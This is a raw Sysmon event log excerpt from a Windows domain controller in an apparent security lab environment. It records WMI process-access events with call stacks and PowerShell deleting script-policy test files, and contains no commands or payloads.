16:54:03.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240310Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240309Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240308Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240307Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-BAAA-00000000AD01}7868C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240306Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-BAAA-00000000AD01}7868C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240305Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240304Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240303Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240302Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240301Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240300Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240299Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240298Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240297Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240296Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240295Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240294Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ccyj0jmt.h5a.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240293Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240292Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240291Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240290Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_oto3wg0j.spm.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240289Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 